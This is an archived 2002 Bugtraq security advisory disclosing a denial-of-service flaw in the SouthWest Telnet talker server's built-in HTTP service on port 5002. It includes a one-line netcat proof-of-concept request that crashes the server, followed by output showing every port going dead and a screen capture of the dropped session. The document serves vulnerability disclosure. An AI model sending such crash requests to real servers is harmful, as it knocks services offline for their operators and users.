Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

SouthWest Telnet talker server. DoS (Denial of Service Attack).

From: Alex Hernandez <alex_hernandez () ureach com>
Date: Mon, 25 Mar 2002 20:59:20 -0500

------oOo------
SouthWest free Telnet talker server. DoS (Denial of Service 
Attack).
------oOo------

Company Affected: Scott Lloyd
Version: v1.0.0
Size: 2.74 MB
OS Affected: : Windows ALL.

Author:

** Alex Hernandez <alex_hernandez () ureach com>
** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.


----=[Brief Description]=------------
 
SouthWest is a free Telnet talker server for Windows. It 
includes full ANSI color support, 
a help system, an intuitive interface, and speed optimizations. 
Free, full source code is 
available at the company's Web site. 

----=[Summary]=----------------------

The server is very similar to the IRC, this server by default 
opens the following ports:

*Main socket initialized and listen on port 5000.
*Netlink socket initialized and listen on port 5001.
*HTTP server initialized and listen port 5002.

The bug is on port 5002, when requesting answer on remote user 
via HTTP for any user
connected and crash the system.


------oOo------
Proof of concept


Example:


DoS

$ printf "GET /&Alex" |nc -vvn 127.0.0.1 5002
(UNKNOWN) [127.0.0.1] 5002 (?) open
sent 10, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5002
(UNKNOWN) [127.0.0.1] 5002 (?): connection refused
sent 0, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5000
(UNKNOWN) [127.0.0.1] 5000 (?): connection refused
sent 0, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5001
(UNKNOWN) [127.0.0.1] 5000 (?): connection refused
sent 0, rcvd 0: NOTSOCK


Crash system and the admin need restart the service!.



U can see this on Screen


[...]
Room: Hallway

You are in the hallway. The large front door leads out to the 
drive whilst
another smaller door leads into the wizards room. A corridor 
leads deeper
into the mansion.

Exits are: Drive  Wizroom  Corridor
Netlinks are: Cyber City

You are all alone here

Access is fixed to PUBLIC and there are 0 messages on the board.
Current topic: Topic has not been set
You say: Hello!
You say: Friends
You say: crash the system .....


Connection to host lost.

[...]

C:\>




------oOo------------------------------------
Vendor Response:
The vendor was notified
southwest () talker com
http://someplaceelse.dynip.com/southwest/
Patch Temporary: No data of vendor.

Alex Hernandez <alex_hernandez () ureach com> (c) 2002.

------oOo------------------------------------






________________________________________________
Get your own "800" number
Voicemail, fax, email, and a lot more
http://www.ureach.com/reg/tag
Previous By Date Next
Previous By Thread Next

Current thread: